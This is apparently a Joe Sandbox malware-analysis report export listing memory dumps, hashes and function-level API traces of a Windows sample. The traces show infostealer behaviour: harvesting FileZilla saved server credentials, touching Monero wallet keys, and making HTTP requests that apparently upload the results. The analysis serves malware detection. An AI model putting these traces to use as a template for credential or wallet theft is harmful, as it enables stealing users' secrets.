                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: d~7
                                  • API String ID: 0-1837143037
                                  • Opcode ID: 0cdf5c7bcc9c391455ef1c89afbc9d5b7a47602d071257a27747be2eaffea320
                                  • Instruction ID: b13b30753f219975cbb82946418853d5473278b6e0277d1381b8098923606f55
                                  • Opcode Fuzzy Hash: 0cdf5c7bcc9c391455ef1c89afbc9d5b7a47602d071257a27747be2eaffea320
                                  • Instruction Fuzzy Hash: D48127B3E093149BE3046E2DDC8573AF7DAEFD4760F1A863ED98887784D93559018782
                                  Function 011DFE05 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Oa~L
                                  • API String ID: 0-1710256035
                                  • Opcode ID: 8014eaf2cb61c3cb4f524029974531707ca23e7c673962f9ccc4089b3875e396
                                  • Instruction ID: cd5191cc9f7bb23ed5372da9e16d799e9b3326e9473bb01eb4b0070bfbd1087b
                                  • Opcode Fuzzy Hash: 8014eaf2cb61c3cb4f524029974531707ca23e7c673962f9ccc4089b3875e396
                                  • Instruction Fuzzy Hash: 636128F3A186105FE7446D7CED8977ABAD5DBD4320F2A863DEAD4C7784E934480486C2
                                  Function 012FB3E1 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: {Gzs
                                  • API String ID: 0-4101231166
                                  • Opcode ID: a1f301567bab9b127e6ec999fba2215f5801a0e44955ee49e86204647b620f7c
                                  • Instruction ID: 533a0d5b43f126e8218b539da87237d4f6123845cee799099087ccf78bfc96db
                                  • Opcode Fuzzy Hash: a1f301567bab9b127e6ec999fba2215f5801a0e44955ee49e86204647b620f7c
                                  • Instruction Fuzzy Hash: 7461B4B39082109BE3146F28DD8536AFBE5EF54720F1A4A3DD9D897780E6399C44CB87
                                  Function 0124C032 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3b5caf0be66455328efee8b3b533d6e2a681844132a90348192dc3551ff5906
                                  • Instruction ID: 6464ca9dff057e89589a8c452d4ef1b548c33f505a09ca29ce6aebe57ac57742
                                  • Opcode Fuzzy Hash: a3b5caf0be66455328efee8b3b533d6e2a681844132a90348192dc3551ff5906
                                  • Instruction Fuzzy Hash: 988154B3B182144BE3446E3DDC8637AB7D9EB90320F1A463DEAC5C7784E939980587D6
                                  Function 01232D27 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d515305e9c0953646115b4ff87341af7aa3594145d06633f7ea78f12faabfb23
                                  • Instruction ID: c78f10e85b480d186a281222e01427f5baa301169017a72eeee74ed25629dc30
                                  • Opcode Fuzzy Hash: d515305e9c0953646115b4ff87341af7aa3594145d06633f7ea78f12faabfb23
                                  • Instruction Fuzzy Hash: 894126B3A087149BE3106A6EEC8575AF7E8EB90360F174539DAC893344E5755C058686
                                  Function 00F79750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00F70250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00F80DBA,00F80DB7,00F80DB6,00F80DB3), ref: 00F70362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F70369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F70385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F703CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F703DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00F70419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F70463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F70562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00F70571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00F70580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F70593
                                  • lstrcat.KERNEL32(?,00F81678), ref: 00F705A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F705B5
                                  • lstrcat.KERNEL32(?,00F8167C), ref: 00F705C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00F705D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F705E6
                                  • lstrcat.KERNEL32(?,00F81688), ref: 00F705F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00F70604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F70617
                                  • lstrcat.KERNEL32(?,00F81698), ref: 00F70626
                                  • lstrcat.KERNEL32(?,00F8169C), ref: 00F70635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 19bf1258227d7fe0f37725954ea88e1950e8fbfa04c7889fd6182c23a55d67b3
                                  • Instruction ID: e6c288d4bef0bc12255ee830b17e29643b8b8599446b4f4abbc7c18a3e16c470
                                  • Opcode Fuzzy Hash: 19bf1258227d7fe0f37725954ea88e1950e8fbfa04c7889fd6182c23a55d67b3
                                  • Instruction Fuzzy Hash: 19D13F71900108ABDB04FBF4DD96DEE7738BF54301F448529F116A7085EE38AA46EB63
                                  Function 00F65960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F659F8
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F65A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F65B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,016FE5D0,00000000,?,016F9CC8,00000000,?,00F81A1C), ref: 00F65E71
                                  • lstrlen.KERNEL32(00000000), ref: 00F65E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00F65E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F65E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00F65EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00F65ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F65EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00F65F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F65F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F65F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FBD
                                  • HttpOpenRequestA.WININET(00000000,016FE490,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F65BF8
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00F65FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: bb3bbaa09b62f6c71e2c752e0f2b39c146493976584d1a365d2d9cd6ecccf18b
                                  • Instruction ID: e2a403b29db65e65e4b9551dd787d3d8ea3b4b357c49b603e8cc66aedadbcc29
                                  • Opcode Fuzzy Hash: bb3bbaa09b62f6c71e2c752e0f2b39c146493976584d1a365d2d9cd6ecccf18b
                                  • Instruction Fuzzy Hash: 46121271820118ABDB19EBA0DC95FEE7378BF54700F41816AF11A63091EF746A4ADF53
                                  Function 00F6CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F6D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F6D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D208
                                  • lstrcat.KERNEL32(?,00F81478), ref: 00F6D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D22A
                                  • lstrcat.KERNEL32(?,00F8147C), ref: 00F6D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D24C
                                  • lstrcat.KERNEL32(?,00F81480), ref: 00F6D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D26E
                                  • lstrcat.KERNEL32(?,00F81484), ref: 00F6D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D290
                                  • lstrcat.KERNEL32(?,00F81488), ref: 00F6D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D2B2
                                  • lstrcat.KERNEL32(?,00F8148C), ref: 00F6D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6D2D4
                                  • lstrcat.KERNEL32(?,00F81490), ref: 00F6D2E3
                                    • Part of subcall function 00F7A820: lstrlen.KERNEL32(00F64F05,?,?,00F64F05,00F80DDE), ref: 00F7A82B
                                    • Part of subcall function 00F7A820: lstrcpy.KERNEL32(00F80DDE,00000000), ref: 00F7A885
                                  • lstrlen.KERNEL32(?), ref: 00F6D32A
                                  • lstrlen.KERNEL32(?), ref: 00F6D339
                                    • Part of subcall function 00F7AA70: StrCmpCA.SHLWAPI(016F8960,00F6A7A7,?,00F6A7A7,016F8960), ref: 00F7AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
